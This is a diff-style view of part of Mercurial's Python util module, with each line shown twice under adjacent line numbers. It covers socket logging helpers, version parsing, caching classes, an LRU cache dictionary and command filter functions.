956 self.fh.write('%s> recv(%d, %d) -> %d' % (
955 self.fh.write('%s> recv(%d, %d) -> %d' % (
957 self.name, size, flags, len(res)))
956 self.name, size, flags, len(res)))
958 self._writedata(res)
957 self._writedata(res)
959
958
960 def recvfrom(self, res, size, flags=0):
959 def recvfrom(self, res, size, flags=0):
961 if not self.reads:
960 if not self.reads:
962 return
961 return
963
962
964 if self.logdataapis:
963 if self.logdataapis:
965 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
964 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
966 self.name, size, flags, len(res[0])))
965 self.name, size, flags, len(res[0])))
967
966
968 self._writedata(res[0])
967 self._writedata(res[0])
969
968
970 def recvfrom_into(self, res, buf, size, flags=0):
969 def recvfrom_into(self, res, buf, size, flags=0):
971 if not self.reads:
970 if not self.reads:
972 return
971 return
973
972
974 if self.logdataapis:
973 if self.logdataapis:
975 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
974 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
976 self.name, size, flags, res[0]))
975 self.name, size, flags, res[0]))
977
976
978 self._writedata(buf[0:res[0]])
977 self._writedata(buf[0:res[0]])
979
978
980 def recv_into(self, res, buf, size=0, flags=0):
979 def recv_into(self, res, buf, size=0, flags=0):
981 if not self.reads:
980 if not self.reads:
982 return
981 return
983
982
984 if self.logdataapis:
983 if self.logdataapis:
985 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
984 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
986 self.name, size, flags, res))
985 self.name, size, flags, res))
987
986
988 self._writedata(buf[0:res])
987 self._writedata(buf[0:res])
989
988
990 def send(self, res, data, flags=0):
989 def send(self, res, data, flags=0):
991 if not self.writes:
990 if not self.writes:
992 return
991 return
993
992
994 self.fh.write('%s> send(%d, %d) -> %d' % (
993 self.fh.write('%s> send(%d, %d) -> %d' % (
995 self.name, len(data), flags, len(res)))
994 self.name, len(data), flags, len(res)))
996 self._writedata(data)
995 self._writedata(data)
997
996
998 def sendall(self, res, data, flags=0):
997 def sendall(self, res, data, flags=0):
999 if not self.writes:
998 if not self.writes:
1000 return
999 return
1001
1000
1002 if self.logdataapis:
1001 if self.logdataapis:
1003 # Returns None on success. So don't bother reporting return value.
1002 # Returns None on success. So don't bother reporting return value.
1004 self.fh.write('%s> sendall(%d, %d)' % (
1003 self.fh.write('%s> sendall(%d, %d)' % (
1005 self.name, len(data), flags))
1004 self.name, len(data), flags))
1006
1005
1007 self._writedata(data)
1006 self._writedata(data)
1008
1007
1009 def sendto(self, res, data, flagsoraddress, address=None):
1008 def sendto(self, res, data, flagsoraddress, address=None):
1010 if not self.writes:
1009 if not self.writes:
1011 return
1010 return
1012
1011
1013 if address:
1012 if address:
1014 flags = flagsoraddress
1013 flags = flagsoraddress
1015 else:
1014 else:
1016 flags = 0
1015 flags = 0
1017
1016
1018 if self.logdataapis:
1017 if self.logdataapis:
1019 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1018 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
1020 self.name, len(data), flags, address, res))
1019 self.name, len(data), flags, address, res))
1021
1020
1022 self._writedata(data)
1021 self._writedata(data)
1023
1022
1024 def setblocking(self, res, flag):
1023 def setblocking(self, res, flag):
1025 if not self.states:
1024 if not self.states:
1026 return
1025 return
1027
1026
1028 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1027 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
1029
1028
1030 def settimeout(self, res, value):
1029 def settimeout(self, res, value):
1031 if not self.states:
1030 if not self.states:
1032 return
1031 return
1033
1032
1034 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1033 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
1035
1034
1036 def gettimeout(self, res):
1035 def gettimeout(self, res):
1037 if not self.states:
1036 if not self.states:
1038 return
1037 return
1039
1038
1040 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1039 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
1041
1040
1042 def setsockopt(self, level, optname, value):
1041 def setsockopt(self, level, optname, value):
1043 if not self.states:
1042 if not self.states:
1044 return
1043 return
1045
1044
1046 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1045 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
1047 self.name, level, optname, value))
1046 self.name, level, optname, value))
1048
1047
1049 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1048 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
1050 logdata=False, logdataapis=True):
1049 logdata=False, logdataapis=True):
1051 """Turn a socket into a logging socket."""
1050 """Turn a socket into a logging socket."""
1052
1051
1053 observer = socketobserver(logh, name, reads=reads, writes=writes,
1052 observer = socketobserver(logh, name, reads=reads, writes=writes,
1054 states=states, logdata=logdata,
1053 states=states, logdata=logdata,
1055 logdataapis=logdataapis)
1054 logdataapis=logdataapis)
1056 return socketproxy(fh, observer)
1055 return socketproxy(fh, observer)
1057
1056
1058 def version():
1057 def version():
1059 """Return version information if available."""
1058 """Return version information if available."""
1060 try:
1059 try:
1061 from . import __version__
1060 from . import __version__
1062 return __version__.version
1061 return __version__.version
1063 except ImportError:
1062 except ImportError:
1064 return 'unknown'
1063 return 'unknown'
1065
1064
1066 def versiontuple(v=None, n=4):
1065 def versiontuple(v=None, n=4):
1067 """Parses a Mercurial version string into an N-tuple.
1066 """Parses a Mercurial version string into an N-tuple.
1068
1067
1069 The version string to be parsed is specified with the ``v`` argument.
1068 The version string to be parsed is specified with the ``v`` argument.
1070 If it isn't defined, the current Mercurial version string will be parsed.
1069 If it isn't defined, the current Mercurial version string will be parsed.
1071
1070
1072 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1071 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1073 returned values:
1072 returned values:
1074
1073
1075 >>> v = b'3.6.1+190-df9b73d2d444'
1074 >>> v = b'3.6.1+190-df9b73d2d444'
1076 >>> versiontuple(v, 2)
1075 >>> versiontuple(v, 2)
1077 (3, 6)
1076 (3, 6)
1078 >>> versiontuple(v, 3)
1077 >>> versiontuple(v, 3)
1079 (3, 6, 1)
1078 (3, 6, 1)
1080 >>> versiontuple(v, 4)
1079 >>> versiontuple(v, 4)
1081 (3, 6, 1, '190-df9b73d2d444')
1080 (3, 6, 1, '190-df9b73d2d444')
1082
1081
1083 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1082 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1084 (3, 6, 1, '190-df9b73d2d444+20151118')
1083 (3, 6, 1, '190-df9b73d2d444+20151118')
1085
1084
1086 >>> v = b'3.6'
1085 >>> v = b'3.6'
1087 >>> versiontuple(v, 2)
1086 >>> versiontuple(v, 2)
1088 (3, 6)
1087 (3, 6)
1089 >>> versiontuple(v, 3)
1088 >>> versiontuple(v, 3)
1090 (3, 6, None)
1089 (3, 6, None)
1091 >>> versiontuple(v, 4)
1090 >>> versiontuple(v, 4)
1092 (3, 6, None, None)
1091 (3, 6, None, None)
1093
1092
1094 >>> v = b'3.9-rc'
1093 >>> v = b'3.9-rc'
1095 >>> versiontuple(v, 2)
1094 >>> versiontuple(v, 2)
1096 (3, 9)
1095 (3, 9)
1097 >>> versiontuple(v, 3)
1096 >>> versiontuple(v, 3)
1098 (3, 9, None)
1097 (3, 9, None)
1099 >>> versiontuple(v, 4)
1098 >>> versiontuple(v, 4)
1100 (3, 9, None, 'rc')
1099 (3, 9, None, 'rc')
1101
1100
1102 >>> v = b'3.9-rc+2-02a8fea4289b'
1101 >>> v = b'3.9-rc+2-02a8fea4289b'
1103 >>> versiontuple(v, 2)
1102 >>> versiontuple(v, 2)
1104 (3, 9)
1103 (3, 9)
1105 >>> versiontuple(v, 3)
1104 >>> versiontuple(v, 3)
1106 (3, 9, None)
1105 (3, 9, None)
1107 >>> versiontuple(v, 4)
1106 >>> versiontuple(v, 4)
1108 (3, 9, None, 'rc+2-02a8fea4289b')
1107 (3, 9, None, 'rc+2-02a8fea4289b')
1109 """
1108 """
1110 if not v:
1109 if not v:
1111 v = version()
1110 v = version()
1112 parts = remod.split('[\+-]', v, 1)
1111 parts = remod.split('[\+-]', v, 1)
1113 if len(parts) == 1:
1112 if len(parts) == 1:
1114 vparts, extra = parts[0], None
1113 vparts, extra = parts[0], None
1115 else:
1114 else:
1116 vparts, extra = parts
1115 vparts, extra = parts
1117
1116
1118 vints = []
1117 vints = []
1119 for i in vparts.split('.'):
1118 for i in vparts.split('.'):
1120 try:
1119 try:
1121 vints.append(int(i))
1120 vints.append(int(i))
1122 except ValueError:
1121 except ValueError:
1123 break
1122 break
1124 # (3, 6) -> (3, 6, None)
1123 # (3, 6) -> (3, 6, None)
1125 while len(vints) < 3:
1124 while len(vints) < 3:
1126 vints.append(None)
1125 vints.append(None)
1127
1126
1128 if n == 2:
1127 if n == 2:
1129 return (vints[0], vints[1])
1128 return (vints[0], vints[1])
1130 if n == 3:
1129 if n == 3:
1131 return (vints[0], vints[1], vints[2])
1130 return (vints[0], vints[1], vints[2])
1132 if n == 4:
1131 if n == 4:
1133 return (vints[0], vints[1], vints[2], extra)
1132 return (vints[0], vints[1], vints[2], extra)
1134
1133
1135 def cachefunc(func):
1134 def cachefunc(func):
1136 '''cache the result of function calls'''
1135 '''cache the result of function calls'''
1137 # XXX doesn't handle keywords args
1136 # XXX doesn't handle keywords args
1138 if func.__code__.co_argcount == 0:
1137 if func.__code__.co_argcount == 0:
1139 cache = []
1138 cache = []
1140 def f():
1139 def f():
1141 if len(cache) == 0:
1140 if len(cache) == 0:
1142 cache.append(func())
1141 cache.append(func())
1143 return cache[0]
1142 return cache[0]
1144 return f
1143 return f
1145 cache = {}
1144 cache = {}
1146 if func.__code__.co_argcount == 1:
1145 if func.__code__.co_argcount == 1:
1147 # we gain a small amount of time because
1146 # we gain a small amount of time because
1148 # we don't need to pack/unpack the list
1147 # we don't need to pack/unpack the list
1149 def f(arg):
1148 def f(arg):
1150 if arg not in cache:
1149 if arg not in cache:
1151 cache[arg] = func(arg)
1150 cache[arg] = func(arg)
1152 return cache[arg]
1151 return cache[arg]
1153 else:
1152 else:
1154 def f(*args):
1153 def f(*args):
1155 if args not in cache:
1154 if args not in cache:
1156 cache[args] = func(*args)
1155 cache[args] = func(*args)
1157 return cache[args]
1156 return cache[args]
1158
1157
1159 return f
1158 return f
1160
1159
1161 class cow(object):
1160 class cow(object):
1162 """helper class to make copy-on-write easier
1161 """helper class to make copy-on-write easier
1163
1162
1164 Call preparewrite before doing any writes.
1163 Call preparewrite before doing any writes.
1165 """
1164 """
1166
1165
1167 def preparewrite(self):
1166 def preparewrite(self):
1168 """call this before writes, return self or a copied new object"""
1167 """call this before writes, return self or a copied new object"""
1169 if getattr(self, '_copied', 0):
1168 if getattr(self, '_copied', 0):
1170 self._copied -= 1
1169 self._copied -= 1
1171 return self.__class__(self)
1170 return self.__class__(self)
1172 return self
1171 return self
1173
1172
1174 def copy(self):
1173 def copy(self):
1175 """always do a cheap copy"""
1174 """always do a cheap copy"""
1176 self._copied = getattr(self, '_copied', 0) + 1
1175 self._copied = getattr(self, '_copied', 0) + 1
1177 return self
1176 return self
1178
1177
1179 class sortdict(collections.OrderedDict):
1178 class sortdict(collections.OrderedDict):
1180 '''a simple sorted dictionary
1179 '''a simple sorted dictionary
1181
1180
1182 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1181 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1183 >>> d2 = d1.copy()
1182 >>> d2 = d1.copy()
1184 >>> d2
1183 >>> d2
1185 sortdict([('a', 0), ('b', 1)])
1184 sortdict([('a', 0), ('b', 1)])
1186 >>> d2.update([(b'a', 2)])
1185 >>> d2.update([(b'a', 2)])
1187 >>> list(d2.keys()) # should still be in last-set order
1186 >>> list(d2.keys()) # should still be in last-set order
1188 ['b', 'a']
1187 ['b', 'a']
1189 '''
1188 '''
1190
1189
1191 def __setitem__(self, key, value):
1190 def __setitem__(self, key, value):
1192 if key in self:
1191 if key in self:
1193 del self[key]
1192 del self[key]
1194 super(sortdict, self).__setitem__(key, value)
1193 super(sortdict, self).__setitem__(key, value)
1195
1194
1196 if pycompat.ispypy:
1195 if pycompat.ispypy:
1197 # __setitem__() isn't called as of PyPy 5.8.0
1196 # __setitem__() isn't called as of PyPy 5.8.0
1198 def update(self, src):
1197 def update(self, src):
1199 if isinstance(src, dict):
1198 if isinstance(src, dict):
1200 src = src.iteritems()
1199 src = src.iteritems()
1201 for k, v in src:
1200 for k, v in src:
1202 self[k] = v
1201 self[k] = v
1203
1202
1204 class cowdict(cow, dict):
1203 class cowdict(cow, dict):
1205 """copy-on-write dict
1204 """copy-on-write dict
1206
1205
1207 Be sure to call d = d.preparewrite() before writing to d.
1206 Be sure to call d = d.preparewrite() before writing to d.
1208
1207
1209 >>> a = cowdict()
1208 >>> a = cowdict()
1210 >>> a is a.preparewrite()
1209 >>> a is a.preparewrite()
1211 True
1210 True
1212 >>> b = a.copy()
1211 >>> b = a.copy()
1213 >>> b is a
1212 >>> b is a
1214 True
1213 True
1215 >>> c = b.copy()
1214 >>> c = b.copy()
1216 >>> c is a
1215 >>> c is a
1217 True
1216 True
1218 >>> a = a.preparewrite()
1217 >>> a = a.preparewrite()
1219 >>> b is a
1218 >>> b is a
1220 False
1219 False
1221 >>> a is a.preparewrite()
1220 >>> a is a.preparewrite()
1222 True
1221 True
1223 >>> c = c.preparewrite()
1222 >>> c = c.preparewrite()
1224 >>> b is c
1223 >>> b is c
1225 False
1224 False
1226 >>> b is b.preparewrite()
1225 >>> b is b.preparewrite()
1227 True
1226 True
1228 """
1227 """
1229
1228
1230 class cowsortdict(cow, sortdict):
1229 class cowsortdict(cow, sortdict):
1231 """copy-on-write sortdict
1230 """copy-on-write sortdict
1232
1231
1233 Be sure to call d = d.preparewrite() before writing to d.
1232 Be sure to call d = d.preparewrite() before writing to d.
1234 """
1233 """
1235
1234
1236 class transactional(object):
1235 class transactional(object):
1237 """Base class for making a transactional type into a context manager."""
1236 """Base class for making a transactional type into a context manager."""
1238 __metaclass__ = abc.ABCMeta
1237 __metaclass__ = abc.ABCMeta
1239
1238
1240 @abc.abstractmethod
1239 @abc.abstractmethod
1241 def close(self):
1240 def close(self):
1242 """Successfully closes the transaction."""
1241 """Successfully closes the transaction."""
1243
1242
1244 @abc.abstractmethod
1243 @abc.abstractmethod
1245 def release(self):
1244 def release(self):
1246 """Marks the end of the transaction.
1245 """Marks the end of the transaction.
1247
1246
1248 If the transaction has not been closed, it will be aborted.
1247 If the transaction has not been closed, it will be aborted.
1249 """
1248 """
1250
1249
1251 def __enter__(self):
1250 def __enter__(self):
1252 return self
1251 return self
1253
1252
1254 def __exit__(self, exc_type, exc_val, exc_tb):
1253 def __exit__(self, exc_type, exc_val, exc_tb):
1255 try:
1254 try:
1256 if exc_type is None:
1255 if exc_type is None:
1257 self.close()
1256 self.close()
1258 finally:
1257 finally:
1259 self.release()
1258 self.release()
1260
1259
1261 @contextlib.contextmanager
1260 @contextlib.contextmanager
1262 def acceptintervention(tr=None):
1261 def acceptintervention(tr=None):
1263 """A context manager that closes the transaction on InterventionRequired
1262 """A context manager that closes the transaction on InterventionRequired
1264
1263
1265 If no transaction was provided, this simply runs the body and returns
1264 If no transaction was provided, this simply runs the body and returns
1266 """
1265 """
1267 if not tr:
1266 if not tr:
1268 yield
1267 yield
1269 return
1268 return
1270 try:
1269 try:
1271 yield
1270 yield
1272 tr.close()
1271 tr.close()
1273 except error.InterventionRequired:
1272 except error.InterventionRequired:
1274 tr.close()
1273 tr.close()
1275 raise
1274 raise
1276 finally:
1275 finally:
1277 tr.release()
1276 tr.release()
1278
1277
1279 @contextlib.contextmanager
1278 @contextlib.contextmanager
1280 def nullcontextmanager():
1279 def nullcontextmanager():
1281 yield
1280 yield
1282
1281
1283 class _lrucachenode(object):
1282 class _lrucachenode(object):
1284 """A node in a doubly linked list.
1283 """A node in a doubly linked list.
1285
1284
1286 Holds a reference to nodes on either side as well as a key-value
1285 Holds a reference to nodes on either side as well as a key-value
1287 pair for the dictionary entry.
1286 pair for the dictionary entry.
1288 """
1287 """
1289 __slots__ = (u'next', u'prev', u'key', u'value')
1288 __slots__ = (u'next', u'prev', u'key', u'value')
1290
1289
1291 def __init__(self):
1290 def __init__(self):
1292 self.next = None
1291 self.next = None
1293 self.prev = None
1292 self.prev = None
1294
1293
1295 self.key = _notset
1294 self.key = _notset
1296 self.value = None
1295 self.value = None
1297
1296
1298 def markempty(self):
1297 def markempty(self):
1299 """Mark the node as emptied."""
1298 """Mark the node as emptied."""
1300 self.key = _notset
1299 self.key = _notset
1301
1300
1302 class lrucachedict(object):
1301 class lrucachedict(object):
1303 """Dict that caches most recent accesses and sets.
1302 """Dict that caches most recent accesses and sets.
1304
1303
1305 The dict consists of an actual backing dict - indexed by original
1304 The dict consists of an actual backing dict - indexed by original
1306 key - and a doubly linked circular list defining the order of entries in
1305 key - and a doubly linked circular list defining the order of entries in
1307 the cache.
1306 the cache.
1308
1307
1309 The head node is the newest entry in the cache. If the cache is full,
1308 The head node is the newest entry in the cache. If the cache is full,
1310 we recycle head.prev and make it the new head. Cache accesses result in
1309 we recycle head.prev and make it the new head. Cache accesses result in
1311 the node being moved to before the existing head and being marked as the
1310 the node being moved to before the existing head and being marked as the
1312 new head node.
1311 new head node.
1313 """
1312 """
1314 def __init__(self, max):
1313 def __init__(self, max):
1315 self._cache = {}
1314 self._cache = {}
1316
1315
1317 self._head = head = _lrucachenode()
1316 self._head = head = _lrucachenode()
1318 head.prev = head
1317 head.prev = head
1319 head.next = head
1318 head.next = head
1320 self._size = 1
1319 self._size = 1
1321 self._capacity = max
1320 self._capacity = max
1322
1321
1323 def __len__(self):
1322 def __len__(self):
1324 return len(self._cache)
1323 return len(self._cache)
1325
1324
1326 def __contains__(self, k):
1325 def __contains__(self, k):
1327 return k in self._cache
1326 return k in self._cache
1328
1327
1329 def __iter__(self):
1328 def __iter__(self):
1330 # We don't have to iterate in cache order, but why not.
1329 # We don't have to iterate in cache order, but why not.
1331 n = self._head
1330 n = self._head
1332 for i in range(len(self._cache)):
1331 for i in range(len(self._cache)):
1333 yield n.key
1332 yield n.key
1334 n = n.next
1333 n = n.next
1335
1334
1336 def __getitem__(self, k):
1335 def __getitem__(self, k):
1337 node = self._cache[k]
1336 node = self._cache[k]
1338 self._movetohead(node)
1337 self._movetohead(node)
1339 return node.value
1338 return node.value
1340
1339
1341 def __setitem__(self, k, v):
1340 def __setitem__(self, k, v):
1342 node = self._cache.get(k)
1341 node = self._cache.get(k)
1343 # Replace existing value and mark as newest.
1342 # Replace existing value and mark as newest.
1344 if node is not None:
1343 if node is not None:
1345 node.value = v
1344 node.value = v
1346 self._movetohead(node)
1345 self._movetohead(node)
1347 return
1346 return
1348
1347
1349 if self._size < self._capacity:
1348 if self._size < self._capacity:
1350 node = self._addcapacity()
1349 node = self._addcapacity()
1351 else:
1350 else:
1352 # Grab the last/oldest item.
1351 # Grab the last/oldest item.
1353 node = self._head.prev
1352 node = self._head.prev
1354
1353
1355 # At capacity. Kill the old entry.
1354 # At capacity. Kill the old entry.
1356 if node.key is not _notset:
1355 if node.key is not _notset:
1357 del self._cache[node.key]
1356 del self._cache[node.key]
1358
1357
1359 node.key = k
1358 node.key = k
1360 node.value = v
1359 node.value = v
1361 self._cache[k] = node
1360 self._cache[k] = node
1362 # And mark it as newest entry. No need to adjust order since it
1361 # And mark it as newest entry. No need to adjust order since it
1363 # is already self._head.prev.
1362 # is already self._head.prev.
1364 self._head = node
1363 self._head = node
1365
1364
1366 def __delitem__(self, k):
1365 def __delitem__(self, k):
1367 node = self._cache.pop(k)
1366 node = self._cache.pop(k)
1368 node.markempty()
1367 node.markempty()
1369
1368
1370 # Temporarily mark as newest item before re-adjusting head to make
1369 # Temporarily mark as newest item before re-adjusting head to make
1371 # this node the oldest item.
1370 # this node the oldest item.
1372 self._movetohead(node)
1371 self._movetohead(node)
1373 self._head = node.next
1372 self._head = node.next
1374
1373
1375 # Additional dict methods.
1374 # Additional dict methods.
1376
1375
1377 def get(self, k, default=None):
1376 def get(self, k, default=None):
1378 try:
1377 try:
1379 return self._cache[k].value
1378 return self._cache[k].value
1380 except KeyError:
1379 except KeyError:
1381 return default
1380 return default
1382
1381
1383 def clear(self):
1382 def clear(self):
1384 n = self._head
1383 n = self._head
1385 while n.key is not _notset:
1384 while n.key is not _notset:
1386 n.markempty()
1385 n.markempty()
1387 n = n.next
1386 n = n.next
1388
1387
1389 self._cache.clear()
1388 self._cache.clear()
1390
1389
1391 def copy(self):
1390 def copy(self):
1392 result = lrucachedict(self._capacity)
1391 result = lrucachedict(self._capacity)
1393 n = self._head.prev
1392 n = self._head.prev
1394 # Iterate in oldest-to-newest order, so the copy has the right ordering
1393 # Iterate in oldest-to-newest order, so the copy has the right ordering
1395 for i in range(len(self._cache)):
1394 for i in range(len(self._cache)):
1396 result[n.key] = n.value
1395 result[n.key] = n.value
1397 n = n.prev
1396 n = n.prev
1398 return result
1397 return result
1399
1398
1400 def _movetohead(self, node):
1399 def _movetohead(self, node):
1401 """Mark a node as the newest, making it the new head.
1400 """Mark a node as the newest, making it the new head.
1402
1401
1403 When a node is accessed, it becomes the freshest entry in the LRU
1402 When a node is accessed, it becomes the freshest entry in the LRU
1404 list, which is denoted by self._head.
1403 list, which is denoted by self._head.
1405
1404
1406 Visually, let's make ``N`` the new head node (* denotes head):
1405 Visually, let's make ``N`` the new head node (* denotes head):
1407
1406
1408 previous/oldest <-> head <-> next/next newest
1407 previous/oldest <-> head <-> next/next newest
1409
1408
1410 ----<->--- A* ---<->-----
1409 ----<->--- A* ---<->-----
1411 | |
1410 | |
1412 E <-> D <-> N <-> C <-> B
1411 E <-> D <-> N <-> C <-> B
1413
1412
1414 To:
1413 To:
1415
1414
1416 ----<->--- N* ---<->-----
1415 ----<->--- N* ---<->-----
1417 | |
1416 | |
1418 E <-> D <-> C <-> B <-> A
1417 E <-> D <-> C <-> B <-> A
1419
1418
1420 This requires the following moves:
1419 This requires the following moves:
1421
1420
1422 C.next = D (node.prev.next = node.next)
1421 C.next = D (node.prev.next = node.next)
1423 D.prev = C (node.next.prev = node.prev)
1422 D.prev = C (node.next.prev = node.prev)
1424 E.next = N (head.prev.next = node)
1423 E.next = N (head.prev.next = node)
1425 N.prev = E (node.prev = head.prev)
1424 N.prev = E (node.prev = head.prev)
1426 N.next = A (node.next = head)
1425 N.next = A (node.next = head)
1427 A.prev = N (head.prev = node)
1426 A.prev = N (head.prev = node)
1428 """
1427 """
1429 head = self._head
1428 head = self._head
1430 # C.next = D
1429 # C.next = D
1431 node.prev.next = node.next
1430 node.prev.next = node.next
1432 # D.prev = C
1431 # D.prev = C
1433 node.next.prev = node.prev
1432 node.next.prev = node.prev
1434 # N.prev = E
1433 # N.prev = E
1435 node.prev = head.prev
1434 node.prev = head.prev
1436 # N.next = A
1435 # N.next = A
1437 # It is tempting to do just "head" here, however if node is
1436 # It is tempting to do just "head" here, however if node is
1438 # adjacent to head, this will do bad things.
1437 # adjacent to head, this will do bad things.
1439 node.next = head.prev.next
1438 node.next = head.prev.next
1440 # E.next = N
1439 # E.next = N
1441 node.next.prev = node
1440 node.next.prev = node
1442 # A.prev = N
1441 # A.prev = N
1443 node.prev.next = node
1442 node.prev.next = node
1444
1443
1445 self._head = node
1444 self._head = node
1446
1445
1447 def _addcapacity(self):
1446 def _addcapacity(self):
1448 """Add a node to the circular linked list.
1447 """Add a node to the circular linked list.
1449
1448
1450 The new node is inserted before the head node.
1449 The new node is inserted before the head node.
1451 """
1450 """
1452 head = self._head
1451 head = self._head
1453 node = _lrucachenode()
1452 node = _lrucachenode()
1454 head.prev.next = node
1453 head.prev.next = node
1455 node.prev = head.prev
1454 node.prev = head.prev
1456 node.next = head
1455 node.next = head
1457 head.prev = node
1456 head.prev = node
1458 self._size += 1
1457 self._size += 1
1459 return node
1458 return node
1460
1459
1461 def lrucachefunc(func):
1460 def lrucachefunc(func):
1462 '''cache most recent results of function calls'''
1461 '''cache most recent results of function calls'''
1463 cache = {}
1462 cache = {}
1464 order = collections.deque()
1463 order = collections.deque()
1465 if func.__code__.co_argcount == 1:
1464 if func.__code__.co_argcount == 1:
1466 def f(arg):
1465 def f(arg):
1467 if arg not in cache:
1466 if arg not in cache:
1468 if len(cache) > 20:
1467 if len(cache) > 20:
1469 del cache[order.popleft()]
1468 del cache[order.popleft()]
1470 cache[arg] = func(arg)
1469 cache[arg] = func(arg)
1471 else:
1470 else:
1472 order.remove(arg)
1471 order.remove(arg)
1473 order.append(arg)
1472 order.append(arg)
1474 return cache[arg]
1473 return cache[arg]
1475 else:
1474 else:
1476 def f(*args):
1475 def f(*args):
1477 if args not in cache:
1476 if args not in cache:
1478 if len(cache) > 20:
1477 if len(cache) > 20:
1479 del cache[order.popleft()]
1478 del cache[order.popleft()]
1480 cache[args] = func(*args)
1479 cache[args] = func(*args)
1481 else:
1480 else:
1482 order.remove(args)
1481 order.remove(args)
1483 order.append(args)
1482 order.append(args)
1484 return cache[args]
1483 return cache[args]
1485
1484
1486 return f
1485 return f
1487
1486
1488 class propertycache(object):
1487 class propertycache(object):
1489 def __init__(self, func):
1488 def __init__(self, func):
1490 self.func = func
1489 self.func = func
1491 self.name = func.__name__
1490 self.name = func.__name__
1492 def __get__(self, obj, type=None):
1491 def __get__(self, obj, type=None):
1493 result = self.func(obj)
1492 result = self.func(obj)
1494 self.cachevalue(obj, result)
1493 self.cachevalue(obj, result)
1495 return result
1494 return result
1496
1495
1497 def cachevalue(self, obj, value):
1496 def cachevalue(self, obj, value):
1498 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1497 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1499 obj.__dict__[self.name] = value
1498 obj.__dict__[self.name] = value
1500
1499
1501 def clearcachedproperty(obj, prop):
1500 def clearcachedproperty(obj, prop):
1502 '''clear a cached property value, if one has been set'''
1501 '''clear a cached property value, if one has been set'''
1503 if prop in obj.__dict__:
1502 if prop in obj.__dict__:
1504 del obj.__dict__[prop]
1503 del obj.__dict__[prop]
1505
1504
1506 def pipefilter(s, cmd):
1505 def pipefilter(s, cmd):
1507 '''filter string S through command CMD, returning its output'''
1506 '''filter string S through command CMD, returning its output'''
1508 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1507 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1509 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1508 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1510 pout, perr = p.communicate(s)
1509 pout, perr = p.communicate(s)
1511 return pout
1510 return pout
1512
1511
1513 def tempfilter(s, cmd):
1512 def tempfilter(s, cmd):
1514 '''filter string S through a pair of temporary files with CMD.
1513 '''filter string S through a pair of temporary files with CMD.
1515 CMD is used as a template to create the real command to be run,
1514 CMD is used as a template to create the real command to be run,
1516 with the strings INFILE and OUTFILE replaced by the real names of
1515 with the strings INFILE and OUTFILE replaced by the real names of
1517 the temporary files generated.'''
1516 the temporary files generated.'''
1518 inname, outname = None, None
1517 inname, outname = None, None
1519 try:
1518 try:
1520 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1519 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1521 fp = os.fdopen(infd, r'wb')
1520 fp = os.fdopen(infd, r'wb')
1522 fp.write(s)
1521 fp.write(s)
1523 fp.close()
1522 fp.close()
1524 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1523 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1525 os.close(outfd)
1524 os.close(outfd)
1526 cmd = cmd.replace('INFILE', inname)
1525 cmd = cmd.replace('INFILE', inname)
1527 cmd = cmd.replace('OUTFILE', outname)
1526 cmd = cmd.replace('OUTFILE', outname)
1528 code = os.system(cmd)
1527 code = os.system(cmd)
1529 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1528 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1530 code = 0
1529 code = 0
1531 if code:
1530 if code:
1532 raise Abort(_("command '%s' failed: %s") %
1531 raise Abort(_("command '%s' failed: %s") %
1533 (cmd, explainexit(code)))
1532 (cmd, explainexit(code)))
1534 return readfile(outname)
1533 return readfile(outname)
1535 finally:
1534 finally:
1536 try:
1535 try:
1537 if inname:
1536 if inname:
1538 os.unlink(inname)
1537 os.unlink(inname)
1539 except OSError:
1538 except OSError:
1540 pass
1539 pass
1541 try:
1540 try:
1542 if outname:
1541 if outname:
1543 os.unlink(outname)
1542 os.unlink(outname)
1544 except OSError:
1543 except OSError:
1545 pass
1544 pass
1546
1545
1547 filtertable = {
1546 filtertable = {
1548 'tempfile:': tempfilter,
1547 'tempfile:': tempfilter,
1549 'pipe:': pipefilter,
1548 'pipe:': pipefilter,
1550 }
1549 }
1551
1550
1552 def filter(s, cmd):
1551 def filter(s, cmd):
1553 "filter a string through a command that transforms its input to its output"
1552 "filter a string through a command that transforms its input to its output"
1554 for name, fn in filtertable.iteritems():
1553 for name, fn in filtertable.iteritems():
1555 if cmd.startswith(name):
1554 if cmd.startswith(name):
1556 return fn(s, cmd[len(name):].lstrip())
1555 return fn(s, cmd[len(name):].lstrip())
1557 return pipefilter(s, cmd)
1556 return pipefilter(s, cmd)
1558
1557
1559 def increasingchunks(source, min=1024, max=65536):
1558 def increasingchunks(source, min=1024, max=65536):
1560 '''return no less than min bytes per chunk while data remains,
1559 '''return no less than min bytes per chunk while data remains,
1561 doubling min after each chunk until it reaches max'''
1560 doubling min after each chunk until it reaches max'''
